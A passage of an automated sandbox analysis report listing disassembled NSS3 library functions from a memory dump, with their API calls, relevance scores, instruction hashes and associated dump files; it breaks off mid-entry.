                                                            • Instruction ID: a2a26e80319fbde5dc1c4dd6d1bb3e6def196351c9b722f617e328e8159a1fad
                                                            • Opcode Fuzzy Hash: 07ea8e3d13e771470e768bc7703b1103fef0a8cceb164188cd2776963d19c3b9
                                                            • Instruction Fuzzy Hash: 1E41E975A012159BEB10CE66DD40BFB73B9AF44208F5C4228DD1AD7B81FB35E889CB91
                                                            Function 6C9FEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6C9FEDFD
                                                            • calloc.MOZGLUE(00000001,00000000), ref: 6C9FEE64
                                                            • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C9FEECC
                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9FEEEB
                                                            • free.MOZGLUE(?), ref: 6C9FEEF6
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ErrorValuecallocfreememcpy
                                                            • String ID:
                                                            • API String ID: 3833505462-0
                                                            • Opcode ID: 8a9a77827a3836bbc8eb45e3183b260ff3088141cd1412d2ecb00c6b065ff350
                                                            • Instruction ID: 9831f141e91bb050fc91fb8773926e444e568797417de7bceae8e511811fc1c8
                                                            • Opcode Fuzzy Hash: 8a9a77827a3836bbc8eb45e3183b260ff3088141cd1412d2ecb00c6b065ff350
                                                            • Instruction Fuzzy Hash: B6310A71A006019BE7209F2DEC447767BF8FB46714F140529E9BA87B90D731E915CBD2
                                                            Function 6CA41EA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6CA26295,?,00000000,00000000,00000001,6CA42653,?), ref: 6CA41ECB
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • TlsGetValue.KERNEL32(?,00000001,?,?,6CA26295,?,00000000,00000000,00000001,6CA42653,?), ref: 6CA41EF1
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA41F01
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA41F39
                                                              • Part of subcall function 6CA4FE20: TlsGetValue.KERNEL32(6CA25ADC,?,00000000,00000001,?,?,00000000,?,6CA1BA55,?,?), ref: 6CA4FE4B
                                                              • Part of subcall function 6CA4FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA4FE5F
                                                            • PR_Unlock.NSS3(?), ref: 6CA41F67
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$CriticalEnterErrorSection$Unlock
                                                            • String ID:
                                                            • API String ID: 704537481-0
                                                            • Opcode ID: aa17a05aa1e44552b9d5e7dd9ba5d788a56a6fa60e05941fd48a325fca4feff5
                                                            • Instruction ID: 05878fcad3b9afe1216e4f86dde1aa6f369a69e2a9590f04fb3af2685e7d7b49
                                                            • Opcode Fuzzy Hash: aa17a05aa1e44552b9d5e7dd9ba5d788a56a6fa60e05941fd48a325fca4feff5
                                                            • Instruction Fuzzy Hash: 3F212875A001049BEB00AE29DC45EAA3779EF45368F588125FE0887711E731D9E6C7D0
                                                            Function 6CA01DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA01E0B
                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA01E24
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA01E3B
                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CA01E8A
                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CA01EAD
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Error$Choice_DecodeTimeUtil
                                                            • String ID:
                                                            • API String ID: 1529734605-0
                                                            • Opcode ID: 4a94d5f4ec6723257c1b353412afc4468674016a6259704c38297a641af5c706
                                                            • Instruction ID: db949e7c21859eaab828c2d1c774e22c18f908c39a6bb618073975bce8d629af
                                                            • Opcode Fuzzy Hash: 4a94d5f4ec6723257c1b353412afc4468674016a6259704c38297a641af5c706
                                                            • Instruction Fuzzy Hash: E221F172F04210ABE7009E68ED40BFE73A49B847ACF184638EE5957780E731D98C86D2
                                                            Function 6CA0AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,6CA03FFF,00000000,?,?,?,?,?,6CA01A1C,00000000,00000000), ref: 6CA0ADA7
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CA03FFF,00000000,?,?,?,?,?,6CA01A1C,00000000,00000000), ref: 6CA0ADB4
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,6CA03FFF,?,?,?,?,6CA03FFF,00000000,?,?,?,?,?,6CA01A1C,00000000), ref: 6CA0ADD5
                                                              • Part of subcall function 6CA5FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA58D2D,?,00000000,?), ref: 6CA5FB85
                                                              • Part of subcall function 6CA5FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA5FBB1
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CB294B0,?,?,?,?,?,?,?,?,6CA03FFF,00000000,?), ref: 6CA0ADEC
                                                              • Part of subcall function 6CA5B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB318D0,?), ref: 6CA5B095
                                                            • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA03FFF), ref: 6CA0AE3C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                            • String ID:
                                                            • API String ID: 2372449006-0
                                                            • Opcode ID: bcec9377e1bb2a3ad58dfdd280f805b458306ed54254c85381561e290baa0f49
                                                            • Instruction ID: 2a2390dd19a5a14dafa3343fbe4c310b25f4d04918981cb5f2d90d6bc8457a4c
                                                            • Opcode Fuzzy Hash: bcec9377e1bb2a3ad58dfdd280f805b458306ed54254c85381561e290baa0f49
                                                            • Instruction Fuzzy Hash: C0112671F002145BE7109A65AD41BBF73B89F9128DF484229EC1997B41FB20E9DD82E2
                                                            Function 6CA28E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PK11_GetInternalKeySlot.NSS3(?,?,?,6CA42E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C), ref: 6CA28EA2
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CA4F854
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CA4F868
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CA4F882
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(04C483FF,?,?), ref: 6CA4F889
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CA4F8A4
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CA4F8AB
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CA4F8C9
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(280F10EC,?,?), ref: 6CA4F8D0
                                                            • PK11_IsLoggedIn.NSS3(?,?,?,6CA42E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C), ref: 6CA28EC3
                                                            • TlsGetValue.KERNEL32(?,?,?,6CA42E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C), ref: 6CA28EDC
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6CA42E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA28EF1
                                                            • PR_Unlock.NSS3 ref: 6CA28F20
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                            • String ID:
                                                            • API String ID: 1978757487-0
                                                            • Opcode ID: c174aced25c921808efc216293fc030c05abf2d1e5eca9c0e880fc9bcf17ad49
                                                            • Instruction ID: 80425a68ceb6efed5caca9433132e75c4d58e42c87d862a9cb4af66aecbb89a9
                                                            • Opcode Fuzzy Hash: c174aced25c921808efc216293fc030c05abf2d1e5eca9c0e880fc9bcf17ad49
                                                            • Instruction Fuzzy Hash: 7421BF719097159FD700AF29C584199BBF0FF08318F09856EED988BB40D734E894CBC2
                                                            Function 6CA2CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA41E10: TlsGetValue.KERNEL32 ref: 6CA41E36
                                                              • Part of subcall function 6CA41E10: EnterCriticalSection.KERNEL32(?,?,?,6CA1B1EE,2404110F,?,?), ref: 6CA41E4B
                                                              • Part of subcall function 6CA41E10: PR_Unlock.NSS3 ref: 6CA41E76
                                                            • free.MOZGLUE(?,6CA2D079,00000000,00000001), ref: 6CA2CDA5
                                                            • PK11_FreeSymKey.NSS3(?,6CA2D079,00000000,00000001), ref: 6CA2CDB6
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CA2D079,00000000,00000001), ref: 6CA2CDCF
                                                            • DeleteCriticalSection.KERNEL32(?,6CA2D079,00000000,00000001), ref: 6CA2CDE2
                                                            • free.MOZGLUE(?), ref: 6CA2CDE9
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                            • String ID:
                                                            • API String ID: 1720798025-0
                                                            • Opcode ID: 164c00ba5490f3fc8121950d693a594dc7ac20cd297c4f46eb8ca4ae3ae89cdd
                                                            • Instruction ID: 907c09375b7b78e7bbbe83f964dbbf0dd543d61a69f057d2dd1267cc2360ab2a
                                                            • Opcode Fuzzy Hash: 164c00ba5490f3fc8121950d693a594dc7ac20cd297c4f46eb8ca4ae3ae89cdd
                                                            • Instruction Fuzzy Hash: 9011C6B6B01125ABEB00AE65EC45E96B73DFF0425C7184131F90987E01D735E4B4CBD1
                                                            Function 6CA63D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CA638A2), ref: 6CA63DB0
                                                            • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CA638A2), ref: 6CA63DBF
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CA638A2), ref: 6CA63DD9
                                                            • _wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6CA638A2), ref: 6CA63DE7
                                                            • free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6CA638A2), ref: 6CA63DF8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
                                                            • String ID:
                                                            • API String ID: 1642359729-0
                                                            • Opcode ID: 778d4f5daf667e1a5e3da72f29ac3293fe1f4c5fb7b0a841b4095b0e51960bda
                                                            • Instruction ID: c17f5dd98bd4cf9cce9dc3640e3e155515360d375c7c82b3368fb7a069a31152
                                                            • Opcode Fuzzy Hash: 778d4f5daf667e1a5e3da72f29ac3293fe1f4c5fb7b0a841b4095b0e51960bda
                                                            • Instruction Fuzzy Hash: 780126B57061227BFB105AB65C09E3B3DADDB41AA8B180235FD28DBA80EA11DC1181F1
                                                            Function 6CA92CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA95B40: PR_GetIdentitiesLayer.NSS3 ref: 6CA95B56
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA92CEC
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA92D02
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA92D1F
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA92D42
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA92D5B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                            • String ID:
                                                            • API String ID: 1593528140-0
                                                            • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                            • Instruction ID: 2d997773c706ac3874e9a4e6ec547c3b929af4f77db19822940ee9a139db6b9b
                                                            • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                            • Instruction Fuzzy Hash: 2701CCB1A102049BEB305E3AFD42BC777E1EF4531CF044625E45986720D732F8598793
                                                            Function 6CA92D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA95B40: PR_GetIdentitiesLayer.NSS3 ref: 6CA95B56
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA92D9C
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA92DB2
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA92DCF
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA92DF2
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA92E0B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                            • String ID:
                                                            • API String ID: 1593528140-0
                                                            • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                            • Instruction ID: aeb6426f90f13c95590acdda4a846fda8897dea371b5faafff3a8171d5e12b9a
                                                            • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                            • Instruction Fuzzy Hash: 3501A5B1A202009BE7309E3AFD42BC7B7F5EB45318F040635E85A86B21D632E8598693
                                                            Function 6CB1BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BDC3
                                                            • free.MOZGLUE(?,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BDCA
                                                            • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BDE9
                                                            • free.MOZGLUE(?,00000000,00000000,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BE21
                                                            • free.MOZGLUE(00000000,00000000,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BE32
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$CriticalDeleteDestroyMonitorSection
                                                            • String ID:
                                                            • API String ID: 3662805584-0
                                                            • Opcode ID: da5f17c94e2ccc4c7f43628f8385b681df71c25e964007c4c1ee29b300f3086a
                                                            • Instruction ID: d09da5fc4a7bc8d03864ff6c2c81c77a82f5ee0079093cb013533bd359f04d52
                                                            • Opcode Fuzzy Hash: da5f17c94e2ccc4c7f43628f8385b681df71c25e964007c4c1ee29b300f3086a
                                                            • Instruction Fuzzy Hash: 6511ECB5B052509FFF00DF6AD849B223BBEFB4A254B540069E68AC7791D7319414CF93
                                                            Function 6CB17C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_Free.NSS3(?), ref: 6CB17C73
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB17C83
                                                            • malloc.MOZGLUE(00000001), ref: 6CB17C8D
                                                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB17C9F
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB17CAD
                                                              • Part of subcall function 6CAC9BF0: TlsGetValue.KERNEL32(?,?,?,6CB10A75), ref: 6CAC9C07
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                            • String ID:
                                                            • API String ID: 105370314-0
                                                            • Opcode ID: be20be7889594ed387f3ab431e43f4317a5557182224d4c1ce25d6f3701f53b4
                                                            • Instruction ID: 41e64e3d2b20982e709fc70a31dd6ceea6c1398a186a679a40f3f9869d6dfd8c
                                                            • Opcode Fuzzy Hash: be20be7889594ed387f3ab431e43f4317a5557182224d4c1ce25d6f3701f53b4
                                                            • Instruction Fuzzy Hash: 16F0C2B1A142467BEB009F7ADD0998B7B58EF04269B118435E809D3F00EB30E118CAE6
                                                            Function 6CB1ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteCriticalSection.KERNEL32(6CB1A6D8), ref: 6CB1AE0D
                                                            • free.MOZGLUE(?), ref: 6CB1AE14
